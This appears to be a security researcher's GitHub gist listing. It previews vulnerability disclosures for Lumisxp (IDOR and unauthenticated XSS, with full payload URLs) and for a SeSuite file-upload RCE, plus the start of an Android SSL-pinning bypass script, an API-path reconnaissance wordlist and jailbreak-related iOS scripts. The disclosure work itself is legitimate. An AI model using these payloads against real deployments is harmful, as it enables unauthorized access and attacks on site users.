:shipit:
see no evil ~ learning..

Rodolfo Tavares - (opcod3r) rodnt

@rodnt
rodnt / How-to-build-frida-server-for-ios.md
Created June 5, 2024 11:24 — forked from miticollo/How-to-build-frida-server-for-ios.md
How to build frida server for iOS jailbroken devices

Here, I'll show you how to compile Frida for both rootful and rootless jailbreaks.

TL;DR

On Dopamine/Fugu15 Max or palera1n you can add my repo (open the link in your favorite browser on your jailbroken iDevice).

The DEBs you will install are built using the following instructions.

Update 2024-02-29

@rodnt
rodnt / fixPerm.sh
Created May 25, 2024 17:37
Fix iOS binary entitlements/access for "Operation not permitted"
#!/bin/bash
# Author: 0xz41 feat Shoaloak
# Description: Fix iOS binary entitlements/access for "Operation not permitted"
ENTITLEMENT="com.apple.private.security.container-manager"
binaries=(
"sh" "bash" "zsh" "dash"
"ls" "cat" "find" "cp" "mv"
"rm" "mkdir" "rmdir" "touch"
"file" "ln" "du" "scp"
@rodnt
rodnt / SeSuite.md
Last active June 12, 2024 15:18
Exploit Softexpert version 2.1 RCE

Description

SeSuite Version 2.1 is vulnerable to command execution via the upload of a malicious file at the form/efms_exec_html/file_upload_parser.php endpoint.

Request

  • Malicious file upload
POST /se/v54285/form/efms_exec_html/file_upload_parser.php HTTP/2
@rodnt
rodnt / idor-lumis.md
Last active June 12, 2024 14:53
IDOR Lumisxp 15.0.x <= 16.1.x

Description

Lumisxp versions 15.0.x to 16.1.x contain a GUID that can be exploited to access internal components without authorization.

Payload

  • URL:
    /main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=
    
@rodnt
rodnt / xss3-lumisxp.md
Last active June 12, 2024 14:50
Unauthenticated XSS Lumisxp 15.0.x <= 16.1.x pageId parameter

Description

Lumisxp versions 15.0.x to 16.1.x have an unauthenticated XSS vulnerability in the pageId parameter.

Request

  • Payload:
    GET /main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=%22%2c%20print()%2c%0d%22aaa
    
@rodnt
rodnt / xss2-lumisxp.md
Last active June 12, 2024 15:02
Unauthenticated XSS Lumisxp 15.0.x <= 16.1.x UrlAccessibilityEvaluation.jsp

Description

Lumisxp versions 15.0.x to 16.1.x have an unauthenticated XSS vulnerability in the UrlAccessibilityEvaluation.jsp page, specifically in the contentHtml parameter.

Request

  • Payload:

GET /lumis/service/htmlevaluation/UrlAccessibilityEvaluation.jsp?contentHtml=%3cp%3e%3ci%20id%3d%22run-code-button%22%20lang%3d%22xml%22%20title%3d%22Run%20Code%20and%20See%20Output%22%3e%3c%2fi%3e%3c%2fp%3e%0a%0a%3cp%3e%3ci%20title%3d%22Light%20Mode%22%3e%3c%2fi%3e%3c%2fp%3e%0a%0a%3ctable%20border%3d%220%22%20cellpadding%3d%220%22%20cellspacing%3d%220mmdfn%26lt%3bscript%26gt%3balert(1)%26lt%3b%2fscript%26gt

@rodnt
rodnt / xss-lumisxp.md
Last active June 12, 2024 15:09
Unauthenticated XSS Lumisxp 15.0.x <= 16.1.x XsltResultControllerHtml.jsp

Description

Lumisxp versions 15.0.x to 16.1.x have an unauthenticated XSS vulnerability in the XsltResultControllerHtml.jsp page, specifically in the lumPageId parameter.

Request

Payload:

  • GET request:
@rodnt
rodnt / mixunpinv2.js
Created December 26, 2023 19:47
Bypass Common SSL Pinning Android
/**
* by rodnt
* twitter: 0xrodnt
* Github: rodnt
*/
const config = {
flutterPatterns: {
android: "F? 0F 1C F8 F? 5? 01 A9 F? 5? 02 A9 F? ?? 03 A9 ?? ?? ?? ?? 68 1A 40 F9"
},
@rodnt
rodnt / paths.txt
Created December 5, 2023 17:18
Common api paths.. swagger..openapi..
/swagger-ui.html
/swagger-ui/
/swagger-ui/index.html
/api-docs
/v2/api-docs
/v3/api-docs
/swagger.json
/openapi.json
/api/swagger.json
/docs
@rodnt
rodnt / win11Pendrive.sh
Created December 2, 2023 10:20
Windows 11 bootable pendrive script
#!/bin/bash
# Function to select the USB device
select_usb_device() {
echo "Available USB devices:"
local devices=(/dev/sd*)
select usb_device in "${devices[@]}"; do
if [ -z "$usb_device" ]; then
echo "Invalid selection, please try again."
else